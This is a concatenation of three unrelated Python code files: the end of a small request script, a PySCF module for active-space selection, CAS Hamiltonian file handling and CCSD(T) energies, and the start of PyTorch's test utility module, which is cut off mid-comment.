'donotsave': '0',
'userID': 'zhuqingj',
'src_path': '/home/zhangli_lab/zhuqingjie/prj/tunet/res_test/0x.bmp',
}
res = do_request(9001, body)
print(res)
|
#coverage:ignore
""" Drivers for various PySCF electronic structure routines """
from typing import Tuple, Optional
import sys
import h5py
import numpy as np
from pyscf import gto, scf, ao2mo, mcscf, lo, tools, cc
from pyscf.mcscf import avas
def stability(pyscf_mf):
"""
Test wave function stability and re-optimize SCF.
Args:
pyscf_mf: PySCF mean field object (e.g. `scf.RHF()`)
Returns:
pyscf_mf: Updated PySCF mean field object
"""
new_orbitals = pyscf_mf.stability()[0]
new_1rdm = pyscf_mf.make_rdm1(new_orbitals, pyscf_mf.mo_occ)
pyscf_mf = pyscf_mf.run(new_1rdm)
return pyscf_mf
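# Usage sketch (assumes `mol` is an already-built gto.M(...) molecule; the names are illustrative only):
#   mf = scf.RHF(mol).run()
#   mf = stability(mf)  # re-run SCF from the stability-analysis orbitals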
def localize(pyscf_mf, loc_type='pm', verbose=0):
""" Localize orbitals given a PySCF mean-field object
Args:
pyscf_mf: PySCF mean field object
loc_type (str): localization type;
            Pipek-Mezey ('pm') or Edmiston-Ruedenberg ('er')
verbose (int): print level during localization
Returns:
pyscf_mf: Updated PySCF mean field object with localized orbitals
"""
    # Note: After loading with `load_casfile_to_pyscf()` you can quiet the message
# by resetting mf.mol, i.e., mf.mol = gto.M(...)
# but this assumes you have the *exact* molecular specification on hand.
# I've gotten acceptable results by restoring mf.mol this way (usually
# followed by calling mf.kernel()). But consistent localization is not a
# given (not unique) despite restoring data this way, hence the message.
if len(pyscf_mf.mol.atom) == 0:
sys.exit("`localize()` requires atom loc. and atomic basis to be" + \
" defined.\n " + \
"It also can be sensitive to the initial guess and MO" + \
" coefficients.\n " + \
"Best to try re-creating the PySCF molecule and doing the" + \
" SCF, rather than\n " + \
"try to load the mean-field object with" + \
" `load_casfile_to_pyscf()`. You can \n " + \
"try to provide the missing information, but consistency" + \
" cannot be guaranteed!")
# Split-localize (localize DOCC, SOCC, and virtual separately)
docc_idx = np.where(np.isclose(pyscf_mf.mo_occ, 2.))[0]
socc_idx = np.where(np.isclose(pyscf_mf.mo_occ, 1.))[0]
virt_idx = np.where(np.isclose(pyscf_mf.mo_occ, 0.))[0]
# Pipek-Mezey
if loc_type.lower() == 'pm':
print("Localizing doubly occupied ... ", end="")
loc_docc_mo = lo.PM(
pyscf_mf.mol,
pyscf_mf.mo_coeff[:, docc_idx]).kernel(verbose=verbose)
print("singly occupied ... ", end="")
loc_socc_mo = lo.PM(
pyscf_mf.mol,
pyscf_mf.mo_coeff[:, socc_idx]).kernel(verbose=verbose)
print("virtual ... ", end="")
loc_virt_mo = lo.PM(
pyscf_mf.mol,
pyscf_mf.mo_coeff[:, virt_idx]).kernel(verbose=verbose)
print("DONE")
    # Edmiston-Ruedenberg
elif loc_type.lower() == 'er':
print("Localizing doubly occupied ... ", end="")
loc_docc_mo = lo.ER(
pyscf_mf.mol,
pyscf_mf.mo_coeff[:, docc_idx]).kernel(verbose=verbose)
print("singly occupied ... ", end="")
loc_socc_mo = lo.ER(
pyscf_mf.mol,
pyscf_mf.mo_coeff[:, socc_idx]).kernel(verbose=verbose)
print("virtual ... ", end="")
loc_virt_mo = lo.ER(
pyscf_mf.mol,
pyscf_mf.mo_coeff[:, virt_idx]).kernel(verbose=verbose)
print("DONE")
# overwrite orbitals with localized orbitals
pyscf_mf.mo_coeff[:, docc_idx] = loc_docc_mo.copy()
pyscf_mf.mo_coeff[:, socc_idx] = loc_socc_mo.copy()
pyscf_mf.mo_coeff[:, virt_idx] = loc_virt_mo.copy()
return pyscf_mf
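# Usage sketch (assumes `mf` was converged from an explicit gto.M(...) molecule so that atom
# positions and the AO basis are available, per the note above):
#   mf = localize(mf, loc_type='pm', verbose=0)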
def avas_active_space(pyscf_mf,
ao_list=None,
molden_fname='avas_localized_orbitals',
**kwargs):
""" Return AVAS active space as PySCF molecule and mean-field object
Args:
pyscf_mf: PySCF mean field object
Kwargs:
ao_list: list of strings of AOs (print mol.ao_labels() to see options)
Example: ao_list = ['H 1s', 'O 2p', 'O 2s'] for water
verbose (bool): do additional print
molden_fname (str): MOLDEN filename to save AVAS active space orbitals.
Default is to save
to 'avas_localized_orbitals.molden'
**kwargs: other keyworded arguments to pass into avas.avas()
Returns:
pyscf_active_space_mol: Updated PySCF molecule object from
AVAS-selected active space
pyscf_active_space_mf: Updated PySCF mean field object from
AVAS-selected active space
"""
# Note: requires openshell_option = 3 for this to work, which keeps all
# singly occupied in CAS
# we also require canonicalize = False so that we don't destroy local orbs
avas_output = avas.avas(pyscf_mf,
ao_list,
canonicalize=False,
openshell_option=3,
**kwargs)
active_norb, active_ne, reordered_orbitals = avas_output
active_alpha, _ = get_num_active_alpha_beta(pyscf_mf, active_ne)
if molden_fname is not None:
# save set of localized orbitals for active space
if isinstance(pyscf_mf, scf.rohf.ROHF):
frozen_alpha = pyscf_mf.nelec[0] - active_alpha
assert frozen_alpha >= 0
else:
frozen_alpha = pyscf_mf.mol.nelectron // 2 - active_alpha
assert frozen_alpha >= 0
active_space_idx = slice(frozen_alpha, frozen_alpha + active_norb)
active_mos = reordered_orbitals[:, active_space_idx]
tools.molden.from_mo(pyscf_mf.mol,
molden_fname + '.molden',
mo_coeff=active_mos)
# Choosing an active space changes the molecule ("freezing" electrons,
# for example), so we
# form the active space tensors first, then re-form the PySCF objects to
# ensure consistency
pyscf_active_space_mol, pyscf_active_space_mf = cas_to_pyscf(
*pyscf_to_cas(pyscf_mf,
cas_orbitals=active_norb,
cas_electrons=active_ne,
avas_orbs=reordered_orbitals))
return pyscf_active_space_mol, pyscf_active_space_mf
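# Usage sketch (the AO label list is the water example from the docstring; the MOLDEN file
# stem is illustrative):
#   cas_mol, cas_mf = avas_active_space(mf,
#                                       ao_list=['H 1s', 'O 2p', 'O 2s'],
#                                       molden_fname='water_avas')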
def cas_to_pyscf(h1, eri, ecore, num_alpha, num_beta):
""" Return a PySCF molecule and mean-field object from pre-computed CAS Ham
Args:
h1 (ndarray) - 2D matrix containing one-body terms (MO basis)
eri (ndarray) - 4D tensor containing two-body terms (MO basis)
ecore (float) - frozen core electronic energy + nuclear repulsion energy
num_alpha (int) - number of spin up electrons in CAS space
num_beta (int) - number of spin down electrons in CAS space
Returns:
pyscf_mol: PySCF molecule object
pyscf_mf: PySCF mean field object
"""
n_orb = len(h1) # number orbitals
assert [n_orb] * 4 == [*eri.shape] # check dims are consistent
pyscf_mol = gto.M()
pyscf_mol.nelectron = num_alpha + num_beta
n_orb = h1.shape[0]
alpha_diag = [1] * num_alpha + [0] * (n_orb - num_alpha)
beta_diag = [1] * num_beta + [0] * (n_orb - num_beta)
# Assumes Hamiltonian is either RHF or ROHF ... should be OK since UHF will
# have two h1s, etc.
if num_alpha == num_beta:
pyscf_mf = scf.RHF(pyscf_mol)
scf_energy = ecore + \
2*np.einsum('ii', h1[:num_alpha,:num_alpha]) + \
2*np.einsum('iijj',
eri[:num_alpha,:num_alpha,:num_alpha,:num_alpha]) - \
np.einsum('ijji',
eri[:num_alpha,:num_alpha,:num_alpha,:num_alpha])
else:
pyscf_mf = scf.ROHF(pyscf_mol)
pyscf_mf.nelec = (num_alpha, num_beta)
# grab singly and doubly occupied orbitals (assume high-spin open shell)
docc = slice(None, min(num_alpha, num_beta))
socc = slice(min(num_alpha, num_beta), max(num_alpha, num_beta))
scf_energy = ecore + \
2.0*np.einsum('ii',h1[docc, docc]) + \
np.einsum('ii',h1[socc, socc]) + \
2.0*np.einsum('iijj',eri[docc, docc, docc, docc]) - \
np.einsum('ijji',eri[docc, docc, docc, docc]) + \
np.einsum('iijj',eri[socc, socc, docc, docc]) - \
0.5*np.einsum('ijji',eri[socc, docc, docc, socc]) + \
np.einsum('iijj',eri[docc, docc, socc, socc]) - \
0.5*np.einsum('ijji',eri[docc, socc, socc, docc]) + \
0.5*np.einsum('iijj',eri[socc, socc, socc, socc]) - \
0.5*np.einsum('ijji',eri[socc, socc, socc, socc])
pyscf_mf.get_hcore = lambda *args: np.asarray(h1)
pyscf_mf.get_ovlp = lambda *args: np.eye(h1.shape[0])
pyscf_mf.energy_nuc = lambda *args: ecore
pyscf_mf._eri = eri # ao2mo.restore('8', np.zeros((8, 8, 8, 8)), 8)
pyscf_mf.e_tot = scf_energy
pyscf_mf.init_guess = '1e'
pyscf_mf.mo_coeff = np.eye(n_orb)
pyscf_mf.mo_occ = np.array(alpha_diag) + np.array(beta_diag)
pyscf_mf.mo_energy, _ = np.linalg.eigh(pyscf_mf.get_fock())
return pyscf_mol, pyscf_mf
def pyscf_to_cas(pyscf_mf,
cas_orbitals: Optional[int] = None,
cas_electrons: Optional[int] = None,
avas_orbs=None):
""" Return CAS Hamiltonian tensors from a PySCF mean-field object
Args:
pyscf_mf: PySCF mean field object
cas_orbitals (int, optional): number of orbitals in CAS space,
default all orbitals
cas_electrons (int, optional): number of electrons in CAS space,
default all electrons
avas_orbs (ndarray, optional): orbitals selected by AVAS in PySCF
Returns:
h1 (ndarray) - 2D matrix containing one-body terms (MO basis)
eri (ndarray) - 4D tensor containing two-body terms (MO basis)
ecore (float) - frozen core electronic energy + nuclear repulsion energy
num_alpha (int) - number of spin up electrons in CAS space
num_beta (int) - number of spin down electrons in CAS space
"""
# Only RHF or ROHF possible with mcscf.CASCI
assert isinstance(pyscf_mf, scf.rhf.RHF) # ROHF is child of RHF class
if cas_orbitals is None:
cas_orbitals = len(pyscf_mf.mo_coeff)
if cas_electrons is None:
cas_electrons = pyscf_mf.mol.nelectron
cas = mcscf.CASCI(pyscf_mf, ncas=cas_orbitals, nelecas=cas_electrons)
h1, ecore = cas.get_h1eff(mo_coeff=avas_orbs)
eri = cas.get_h2cas(mo_coeff=avas_orbs)
eri = ao2mo.restore('s1', eri, h1.shape[0]) # chemist convention (11|22)
ecore = float(ecore)
num_alpha, num_beta = get_num_active_alpha_beta(pyscf_mf, cas_electrons)
return h1, eri, ecore, num_alpha, num_beta
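# Round-trip sketch (the active-space sizes are illustrative; `mf` is a converged RHF/ROHF
# mean-field object):
#   h1, eri, ecore, n_a, n_b = pyscf_to_cas(mf, cas_orbitals=8, cas_electrons=8)
#   cas_mol, cas_mf = cas_to_pyscf(h1, eri, ecore, n_a, n_b)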
def get_num_active_alpha_beta(pyscf_mf, cas_electrons):
""" Return number of alpha and beta electrons in the active space given
number of CAS electrons
This assumes that all the unpaired electrons are in the active space
Args:
pyscf_mf: PySCF mean field object
        cas_electrons (int): number of electrons in CAS space
Returns:
num_alpha (int): number of alpha (spin-up) electrons in active space
num_beta (int): number of beta (spin-down) electrons in active space
"""
# Sanity checks and active space info
total_electrons = pyscf_mf.mol.nelectron
frozen_electrons = total_electrons - cas_electrons
assert frozen_electrons % 2 == 0
# ROHF == RHF but RHF != ROHF, and we only do either RHF or ROHF
if isinstance(pyscf_mf, scf.rohf.ROHF):
frozen_alpha = frozen_electrons // 2
frozen_beta = frozen_electrons // 2
num_alpha = pyscf_mf.nelec[0] - frozen_alpha
num_beta = pyscf_mf.nelec[1] - frozen_beta
assert np.isclose(num_beta + num_alpha, cas_electrons)
else:
assert cas_electrons % 2 == 0
num_alpha = cas_electrons // 2
num_beta = cas_electrons // 2
return num_alpha, num_beta
def load_casfile_to_pyscf(fname,
num_alpha: Optional[int] = None,
num_beta: Optional[int] = None):
""" Load CAS Hamiltonian from pre-computed HD5 file into a PySCF molecule
and mean-field object
Args:
        fname (str): path to an existing HDF5 file containing CAS one- and
            two-body terms
num_alpha (int, optional): number of spin up electrons in CAS space
num_beta (int, optional): number of spin down electrons in CAS space
Returns:
pyscf_mol: PySCF molecule object
pyscf_mf: PySCF mean field object
"""
with h5py.File(fname, "r") as f:
eri = np.asarray(f['eri'][()])
# The one-body elements (h1) are stored under different key names. Try a few.
try:
h1 = np.asarray(f['h0'][()])
except KeyError:
try:
h1 = np.asarray(f['hcore'][()])
except KeyError:
try:
h1 = np.asarray(f['h1'][()])
except KeyError:
raise KeyError("Could not find 1-electron Hamiltonian")
# The core energy is sometimes stored as 'ecore' and sometimes as 'enuc' (no frozen electrons)
try:
ecore = float(f['ecore'][()])
except KeyError:
try:
ecore = float(f['enuc'][()])
except KeyError:
ecore = 0.0
# read the number of spin up and spin down electrons if not input
if (num_alpha is None) or (num_beta is None):
try:
num_alpha = int(f['active_nalpha'][()])
except KeyError:
sys.exit("In `load_casfile_to_pyscf()`: \n" + \
" No values found on file for num_alpha " + \
"(key: 'active_nalpha' in h5). " + \
" Try passing in a value for num_alpha, or" + \
" re-check integral file.")
try:
num_beta = int(f['active_nbeta'][()])
except KeyError:
sys.exit("In `load_casfile_to_pyscf()`: \n" + \
" No values found on file for num_beta " + \
"(key: 'active_nbeta' in h5). " + \
" Try passing in a value for num_beta, or" + \
" re-check integral file.")
pyscf_mol, pyscf_mf = cas_to_pyscf(h1, eri, ecore, num_alpha, num_beta)
return pyscf_mol, pyscf_mf
def save_pyscf_to_casfile(fname,
pyscf_mf,
cas_orbitals: Optional[int] = None,
cas_electrons: Optional[int] = None,
avas_orbs=None):
""" Save CAS Hamiltonian from a PySCF mean-field object to an HD5 file
Args:
fname (str): path to HDF5 file to be created containing the CAS terms
pyscf_mf: PySCF mean field object
cas_orbitals (int, optional): number of orb in CAS space, default all
cas_electrons (int, optional): number of elec in CAS, default all elec
avas_orbs (ndarray, optional): orbitals selected by AVAS in PySCF
"""
h1, eri, ecore, num_alpha, num_beta = \
pyscf_to_cas(pyscf_mf, cas_orbitals, cas_electrons, avas_orbs)
with h5py.File(fname, 'w') as fid:
fid.create_dataset('ecore', data=float(ecore), dtype=float)
fid.create_dataset(
'h0',
data=h1) # note the name change to be consistent with THC paper
fid.create_dataset('eri', data=eri)
fid.create_dataset('active_nalpha', data=int(num_alpha), dtype=int)
fid.create_dataset('active_nbeta', data=int(num_beta), dtype=int)
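# Hedged sketch (not part of the original module): round-trip a mean-field
# object through an HDF5 CAS file using the two helpers above. The file name
# is a hypothetical temporary path chosen only for illustration.
def _example_casfile_roundtrip(pyscf_mf, fname='example_cas.h5'):
    save_pyscf_to_casfile(fname, pyscf_mf)
    # Reconstruct a molecule / mean-field pair from the stored h0, eri, ecore,
    # active_nalpha and active_nbeta datasets.
    pyscf_mol, pyscf_mf_loaded = load_casfile_to_pyscf(fname)
    return pyscf_mol, pyscf_mf_loaded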
def factorized_ccsd_t(pyscf_mf, eri_rr = None, use_kernel = True,\
no_triples=False) -> Tuple[float, float, float]:
""" Compute CCSD(T) energy using rank-reduced ERIs
Args:
pyscf_mf - PySCF mean field object
eri_rr (ndarray) - rank-reduced ERIs, or use full ERIs from pyscf_mf
use_kernel (bool) - re-do SCF, using canonical orbitals for one-body?
no_triples (bool) - skip the perturbative triples correction? (CCSD)
Returns:
e_scf (float) - SCF energy
e_cor (float) - Correlation energy from CCSD(T)
e_tot (float) - Total energy; i.e. SCF + Corr energy from CCSD(T)
"""
h1, eri_full, ecore, num_alpha, num_beta = pyscf_to_cas(pyscf_mf)
# If no rank-reduced ERIs, use the full (possibly local) ERIs from pyscf_mf
if eri_rr is None:
eri_rr = eri_full
e_scf, e_cor, e_tot = ccsd_t(h1, eri_rr, ecore, num_alpha, num_beta,\
eri_full, use_kernel, no_triples)
return e_scf, e_cor, e_tot
def ccsd_t(h1, eri, ecore, num_alpha: int, num_beta: int, eri_full = None,\
use_kernel=True, no_triples=False) -> Tuple[float, float, float]:
""" Helper function to do CCSD(T) on set of one- and two-body Hamil elems
Args:
h1 (ndarray) - 2D matrix containing one-body terms (MO basis)
eri (ndarray) - 4D tensor containing two-body terms (MO basis)
may be from integral factorization (e.g. SF/DF/THC)
ecore (float) - frozen core electronic energy + nuclear repulsion energy
num_alpha (int) - number of spin alpha electrons in Hamiltonian
num_beta (int) - number of spin beta electrons in Hamiltonian
eri_full (ndarray) - optional 4D tensor containing full two-body
terms (MO basis) for the SCF procedure only
use_kernel (bool) - re-run SCF prior to doing CCSD(T)?
no_triples (bool) - skip the perturbative triples correction? (CCSD)
Returns:
e_scf (float) - SCF energy
e_cor (float) - Correlation energy from CCSD(T)
e_tot (float) - Total energy; i.e. SCF + Corr energy from CCSD(T)
"""
mol = gto.M()
mol.nelectron = num_alpha + num_beta
n_orb = h1.shape[0]
alpha_diag = [1] * num_alpha + [0] * (n_orb - num_alpha)
beta_diag = [1] * num_beta + [0] * (n_orb - num_beta)
# If eri_full not provided, use (possibly rank-reduced) ERIs for check
if eri_full is None:
eri_full = eri
# either RHF or ROHF ... should be OK since UHF will have two h1s, etc.
if num_alpha == num_beta:
mf = scf.RHF(mol)
scf_energy = ecore + \
2*np.einsum('ii',h1[:num_alpha,:num_alpha]) + \
2*np.einsum('iijj',eri_full[:num_alpha,\
:num_alpha,\
:num_alpha,\
:num_alpha]) - \
np.einsum('ijji',eri_full[:num_alpha,\
:num_alpha,\
:num_alpha,\
:num_alpha])
else:
mf = scf.ROHF(mol)
mf.nelec = (num_alpha, num_beta)
# grab singly and doubly occupied orbitals (assume high-spin open shell)
docc = slice(None, min(num_alpha, num_beta))
socc = slice(min(num_alpha, num_beta), max(num_alpha, num_beta))
scf_energy = ecore + \
2.0*np.einsum('ii',h1[docc, docc]) + \
np.einsum('ii',h1[socc, socc]) + \
2.0*np.einsum('iijj',eri_full[docc, docc, docc, docc]) - \
np.einsum('ijji',eri_full[docc, docc, docc, docc]) + \
np.einsum('iijj',eri_full[socc, socc, docc, docc]) - \
0.5*np.einsum('ijji',eri_full[socc, docc, docc, socc]) + \
np.einsum('iijj',eri_full[docc, docc, socc, socc]) - \
0.5*np.einsum('ijji',eri_full[docc, socc, socc, docc]) + \
0.5*np.einsum('iijj',eri_full[socc, socc, socc, socc]) - \
0.5*np.einsum('ijji',eri_full[socc, socc, socc, socc])
mf.get_hcore = lambda *args: np.asarray(h1)
mf.get_ovlp = lambda *args: np.eye(h1.shape[0])
mf.energy_nuc = lambda *args: ecore
mf._eri = eri_full # ao2mo.restore('8', np.zeros((8, 8, 8, 8)), 8)
mf.init_guess = '1e'
mf.mo_coeff = np.eye(n_orb)
mf.mo_occ = np.array(alpha_diag) + np.array(beta_diag)
w, _ = np.linalg.eigh(mf.get_fock())
mf.mo_energy = w
# Rotate the interaction tensors into the canonical basis.
# The Reiher and Li tensors, for example, are read in using a localized MO basis,
# which is not optimal for the CCSD(T) calculation (canonical gives better
# energy estimate whereas QPE is invariant to choice of basis)
if use_kernel:
mf.conv_tol = 1e-7
mf.init_guess = '1e'
mf.verbose = 4
mf.diis_space = 24
mf.level_shift = 0.5
mf.conv_check = False
mf.max_cycle = 800
mf.kernel(mf.make_rdm1(mf.mo_coeff,
mf.mo_occ)) # use MO info to generate guess
mf = stability(mf)
mf = stability(mf)
mf = stability(mf)
# Check if SCF has changed by doing restart, and print warning if so
try:
assert np.isclose(scf_energy, mf.e_tot, rtol=1e-14)
except AssertionError:
print(
"WARNING: E(SCF) from input integrals does not match E(SCF)" + \
" from mf.kernel()")
print(" Will use E(SCF) = {:12.6f} from mf.kernel going forward.".
format(mf.e_tot))
print("E(SCF, ints) = {:12.6f} whereas E(SCF) = {:12.6f}".format(
scf_energy, mf.e_tot))
# New SCF energy and orbitals for CCSD(T)
scf_energy = mf.e_tot
# Now re-set the eri's to the (possibly rank-reduced) ERIs
mf._eri = eri
mf.mol.incore_anyway = True
mycc = cc.CCSD(mf)
mycc.max_cycle = 800
mycc.conv_tol = 1E-8
mycc.conv_tol_normt = 1E-4
mycc.diis_space = 24
mycc.verbose = 4
mycc.kernel()
if no_triples:
et = 0.0
else:
et = mycc.ccsd_t()
e_scf = scf_energy # may be read-in value or 'fresh' SCF value
e_cor = mycc.e_corr + et
e_tot = e_scf + e_cor
print("E(SCF): ", e_scf)
print("E(cor): ", e_cor)
print("Total energy: ", e_tot)
return e_scf, e_cor, e_tot
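# Hedged sketch (not part of the original module): run the CCSD(T) helper on
# the full, unfactorized integrals of a converged mean-field object, keeping
# the read-in orbitals by skipping the SCF restart.
def _example_ccsd_t(pyscf_mf):
    h1, eri_full, ecore, na, nb = pyscf_to_cas(pyscf_mf)
    return ccsd_t(h1, eri_full, ecore, na, nb, eri_full, use_kernel=False)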
def open_shell_t1_d1(t1a, t1b, mo_occ, nalpha, nbeta):
"""
The open-shell T1 diagnostic is defined w.r.t. the Sx eigenfunction of T1,
where the reference is ROHF.
Given i doubly occupied, c unoccupied, and x singly occupied, the T1 amps
(high spin) in Sz basis are:
T1 = t_{ia}^{ca}(ca^ ia) + t_{ib}^{cb}(cb^ ib)
+ t_{xa}^{ca}(ca^ xa) + t_{ib}^{xb}(xb^ ib)
T1 in the Sx basis are
T1 = f_{i}^{c}E_{ci} + v_{i}^{c}A_{ci}
+ sqrt(2)f_{x}^{c}(ca^ xa) + sqrt(2)f_{i}^{x}(xb^ ib)
where E_{ci} = ca^ ia + cb^ ib and A_{ci} = ca^ ia - cb^ ib.
See: The Journal of Chemical Physics 98, 9734 (1993);
doi: 10.1063/1.464352
Chemical Physics Letters 372 (2003) 362–367;
doi:10.1016/S0009-2614(03)00435-4
Based on these and two papers from Lee, the open-shell T1 diagnostic is
sqrt(sum_{ia}(f_{ia})^2 + 2 sum_{xa}(t_{xa}^{ca})^2
+ 2 sum_{ix}(t_{ib}^{xb})^2) / (2 sqrt{N})
To get this relate eqs 3-7 from Chemical Physics Letters 372 (2003) 362–367
to Eqs. 45, 46, and 51 from Journal of Chemical Physics 98, 9734 (1993);
doi: 10.1063/1.464352.
"""
# compute t1-diagnostic
docc_idx = np.where(np.isclose(mo_occ, 2.))[0]
socc_idx = np.where(np.isclose(mo_occ, 1.))[0]
virt_idx = np.where(np.isclose(mo_occ, 0.))[0]
t1a_docc = t1a[docc_idx, :] # double occ-> virtual
t1b_docc = t1b[docc_idx, :][:, -len(virt_idx):] # double occ-> virtual
if len(socc_idx) > 0:
t1_xa = t1a[socc_idx, :] # single occ -> virtual
t1_ix = t1b[docc_idx, :][:, :len(socc_idx)] # double occ -> single occ
else:
t1_xa = np.array(())
t1_ix = np.array(())
if nalpha - nbeta + len(virt_idx) != t1b.shape[1]:
raise ValueError(
"Inconsistent shapes na {}, nb {}, t1b.shape {},{}".format(
nalpha, nbeta, t1b.shape[0], t1b.shape[1]))
if t1a_docc.shape != (len(docc_idx), len(virt_idx)):
raise ValueError("T1a_ia does not have the right shape")
if t1b_docc.shape != (len(docc_idx), len(virt_idx)):
raise ValueError("T1b_ia does not have the right shape")
if len(socc_idx) > 0:
if t1_ix.shape != (len(docc_idx), len(socc_idx)):
raise ValueError("T1_ix does not have the right shape")
if t1_xa.shape != (len(socc_idx), len(virt_idx)):
raise ValueError("T1_xa does not have the right shape")
t1_diagnostic = np.sqrt(
np.sum((t1a_docc + t1b_docc)**2) + 2 * np.sum(t1_xa**2) +
2 * np.sum(t1_ix**2)) / (2 * np.sqrt(nalpha + nbeta))
# compute D1-diagnostic
f_ia = 0.5 * (t1a_docc + t1b_docc)
s_f_ia_2, _ = np.linalg.eigh(f_ia @ f_ia.T)
s_f_ia_2_norm = np.sqrt(np.max(s_f_ia_2, initial=0))
if len(socc_idx) > 0:
f_xa = np.sqrt(1 / 2) * t1_xa
f_ix = np.sqrt(1 / 2) * t1_ix
s_f_xa_2, _ = np.linalg.eigh(f_xa @ f_xa.T)
s_f_ix_2, _ = np.linalg.eigh(f_ix @ f_ix.T)
else:
s_f_xa_2 = np.array(())
s_f_ix_2 = np.array(())
s_f_xa_2_norm = np.sqrt(np.max(s_f_xa_2, initial=0))
s_f_ix_2_norm = np.sqrt(np.max(s_f_ix_2, initial=0))
d1_diagnostic = np.max(
np.array([s_f_ia_2_norm, s_f_xa_2_norm, s_f_ix_2_norm]))
return t1_diagnostic, d1_diagnostic
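# Hedged sketch (not part of the original module): compute the open-shell
# T1/D1 diagnostics from spin-unrestricted CCSD amplitudes of a high-spin
# ROHF reference. 'mycc' is assumed to be a converged cc.UCCSD object and
# 'pyscf_mf' an ROHF object (which exposes .nelec); the occupied orbitals
# are assumed to follow the docc/socc ordering described in the docstring.
def _example_open_shell_t1_d1(pyscf_mf, mycc):
    t1a, t1b = mycc.t1
    nalpha, nbeta = pyscf_mf.nelec
    return open_shell_t1_d1(t1a, t1b, pyscf_mf.mo_occ, nalpha, nbeta)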
|
r"""Importing this file must **not** initialize CUDA context. test_distributed
relies on this assumption to properly run. This means that when this is imported
no CUDA calls shall be made, including torch.cuda.device_count(), etc.
torch.testing._internal.common_cuda.py can freely initialize CUDA context when imported.
"""
import sys
import os
import platform
import re
import gc
import types
from functools import partial
import inspect
import io
import argparse
import unittest
import warnings
import random
import contextlib
import socket
import subprocess
import time
from collections import OrderedDict
from contextlib import contextmanager
from functools import wraps
from itertools import product
from copy import deepcopy
from numbers import Number
import tempfile
import json
from urllib.request import urlopen
import __main__
import errno
from typing import cast, Any, Iterable, Optional
from torch.testing._internal import expecttest
from torch.testing import _compare_tensors_internal, _compare_scalars_internal, _compare_return_type
import torch
import torch.cuda
from torch._utils_internal import get_writable_path
from torch._six import string_classes
import torch.backends.cudnn
import torch.backends.mkl
from enum import Enum
from torch.autograd import gradcheck
from torch.autograd.gradcheck import gradgradcheck
torch.backends.disable_global_flags()
IS_SANDCASTLE = os.getenv('SANDCASTLE') == '1' or os.getenv('TW_JOB_USER') == 'sandcastle'
class ProfilingMode(Enum):
LEGACY = 1
SIMPLE = 2
PROFILING = 3
def cppProfilingFlagsToProfilingMode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
if old_prof_exec_state:
if old_prof_mode_state:
return ProfilingMode.PROFILING
else:
return ProfilingMode.SIMPLE
else:
return ProfilingMode.LEGACY
@contextmanager
def enable_profiling_mode_for_profiling_tests():
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def enable_profiling_mode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def num_profiled_runs(num_runs):
old_num_runs = torch._C._jit_set_num_profiled_runs(num_runs)
try:
yield
finally:
torch._C._jit_set_num_profiled_runs(old_num_runs)
func_call = torch._C.ScriptFunction.__call__
meth_call = torch._C.ScriptMethod.__call__
def prof_callable(callable, *args, **kwargs):
if 'profile_and_replay' in kwargs:
del kwargs['profile_and_replay']
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
with enable_profiling_mode_for_profiling_tests():
callable(*args, **kwargs)
return callable(*args, **kwargs)
return callable(*args, **kwargs)
def prof_func_call(*args, **kwargs):
return prof_callable(func_call, *args, **kwargs)
def prof_meth_call(*args, **kwargs):
return prof_callable(meth_call, *args, **kwargs)
torch._C.ScriptFunction.__call__ = prof_func_call
torch._C.ScriptMethod.__call__ = prof_meth_call
def _get_test_report_path():
# allow users to override the test file location. We need this
# because the distributed tests run the same test file multiple
# times with different configurations.
override = os.environ.get('TEST_REPORT_SOURCE_OVERRIDE')
test_source = override if override is not None else 'python-unittest'
return os.path.join('test-reports', test_source)
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('--subprocess', action='store_true',
help='whether to run each test in a subprocess')
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--accept', action='store_true')
parser.add_argument('--ge_config', type=str)
parser.add_argument('--repeat', type=int, default=1)
parser.add_argument('--test_bailouts', action='store_true')
parser.add_argument('--save-xml', nargs='?', type=str,
const=_get_test_report_path(),
default=_get_test_report_path() if bool(os.environ.get('IN_CIRCLECI')) else None)
parser.add_argument('--discover-tests', action='store_true')
parser.add_argument('--log-suffix', type=str, default="")
parser.add_argument('--run-parallel', type=int, default=1)
args, remaining = parser.parse_known_args()
if args.ge_config == 'legacy':
GRAPH_EXECUTOR = ProfilingMode.LEGACY
elif args.ge_config == 'profiling':
GRAPH_EXECUTOR = ProfilingMode.PROFILING
elif args.ge_config == 'simple':
GRAPH_EXECUTOR = ProfilingMode.SIMPLE
else:
# infer flags based on the default settings
GRAPH_EXECUTOR = cppProfilingFlagsToProfilingMode()
LOG_SUFFIX = args.log_suffix
RUN_PARALLEL = args.run_parallel
TEST_BAILOUTS = args.test_bailouts
TEST_DISCOVER = args.discover_tests
TEST_IN_SUBPROCESS = args.subprocess
TEST_SAVE_XML = args.save_xml
REPEAT_COUNT = args.repeat
SEED = args.seed
if not expecttest.ACCEPT:
expecttest.ACCEPT = args.accept
UNITTEST_ARGS = [sys.argv[0]] + remaining
torch.manual_seed(SEED)
def wait_for_process(p):
try:
return p.wait()
except KeyboardInterrupt:
# Give `p` a chance to handle KeyboardInterrupt. Without this,
# `pytest` can't print errors it collected so far upon KeyboardInterrupt.
exit_status = p.wait(timeout=5)
if exit_status is not None:
return exit_status
else:
p.kill()
raise
except: # noqa E722, copied from python core library
p.kill()
raise
finally:
# Always call p.wait() to ensure exit
p.wait()
def shell(command, cwd=None, env=None):
sys.stdout.flush()
sys.stderr.flush()
# The following snippet is copied from the Py3 core library's subprocess.call,
# with only these changes:
# 1. an `except KeyboardInterrupt` block added for SIGINT handling.
# 2. In Py2, subprocess.Popen doesn't return a context manager, so we do
# `p.wait()` in a `finally` block to keep the code portable.
#
